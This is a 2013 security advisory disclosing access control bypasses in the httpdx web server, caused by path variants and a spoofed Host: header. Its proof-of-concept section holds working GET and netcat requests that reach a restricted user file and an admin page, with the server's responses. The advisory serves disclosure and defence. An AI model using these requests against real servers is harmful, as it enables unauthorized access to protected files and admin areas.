-------------------------------------------------------------------------------------------- 20130212 - Justanotherhacker.com : httpdx multiple access control bypass JAHx131 - http://www.justanotherhacker.com/advisories/JAHx131.txt -------------------------------------------------------------------------------------------- Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with only few threads. Includes directory listing, virtual hosting, basic auth., support for PHP, Perl, Python, SSI, etc. All settings in one config/script file. [ Taken from: http://sourceforge.net/projects/httpdx/ ] --- Vulnerability description --- Access control in httpdx is done with string matching directives in the configuration file. Request variables are compared to static strings to determine if access should be granted. Examples provided in the default configuration include: if<%REQUEST_URI% == "/data/users.txt*">{ http.deny = 1; } And another example: if<%REQUEST_URI% == "/admin.html*">{ http.auth = { //authorization needed for admin's section user="admin", pass="passw000", realm="Stuff for admin only!" }; As long as your request does not match these static strings, but the path resolves to the same files you can access the content. Additionally, as the server doesn't support traditional binding of virtualhosts to network interfaces you must configure virtualhost specific behaviour through similar string matching directives. if<%HTTP_HOST% != "127.0.0.1" && %HTTP_HOST% == {localhost,127.*.*.*}>{ The variable HTTP_HOST is set from the Host: header in the request, so in order to access the localhost virtualhost remotely, just set your Host: header to localhost. Discovered by: Eldar "Wireghoul" Marcussen Type: Access control bypass Severity: Low Release: Full disclosure CVE: None Vendor: httpdx - http://sourceforge.net/projects/httpdx/ Affected versions: 1.5.5, 1.5.4 and probably earlier versions --- Proof of Concept --- The server comes with two examples of access control, a restricted file and a password protected administrator area running on localhost. The following examples successfully access these restricted areas remotely: Access user file: user@~$ GET http://192.168.58.135/data//users.txt user1=pass123 user2=pass321 Access admin console: user@~$ echo -e "GET /%2fadmin.html HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 192.168.58.135 80 HTTP/1.1 200 OK Date: Thu, 08 Nov 2012 03:25:58 GMT Content-Type: text/html Last-Modified: Mon, 20 Jul 2009 14:03:48 GMT Content-Length: 36 Connection: close Server: httpdx/1.5.4 (Win32) Pragma: no-cache Ok, you're now at admin's section. --- Solution --- The software appears to be abandoned and the same versions suffers from remote code execution bugs. Use different software instead. --- Disclosure time line --- 12-Feb-2013 - Public disclosure